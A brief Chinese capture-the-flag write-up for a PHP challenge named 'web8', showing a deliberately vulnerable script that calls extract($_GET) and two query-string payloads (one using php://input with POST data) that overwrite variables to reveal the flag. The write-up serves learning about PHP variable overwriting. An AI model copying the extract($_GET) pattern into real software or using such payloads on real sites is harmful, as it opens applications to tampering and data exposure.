web8
110
txt？？？？
http://120.24.86.145:8002/web8/

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

• extract() -使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量.
• empty()-判断一个变量是否被认为是空的。当一个变量并不存在，或者它的值等同于FALSE，那么它会被认为不存在。如果变量不存在的话，empty()并不会产生警告。
• trim()-移除字符串两侧的空白字符或其他预定义字符。
• file_get_contents-将整个文件读入一个字符串

可知，获取flag要使ac不为空，f 的值从文件fn中获取，并且ac===f

姿势1：构造payload:
url:?/ac=aa&&fn=php://input
post data :aa

姿势2 ：猜测目录下有txt文件，测试出flag.txt。构造：
?ac=flags&fn=flag.txt

可得出flag

• php://input 是个可以访问请求的原始数据的只读流
• php://input 读取POST数据，不可读取GET数据
• $data = file_get_contents("php://input");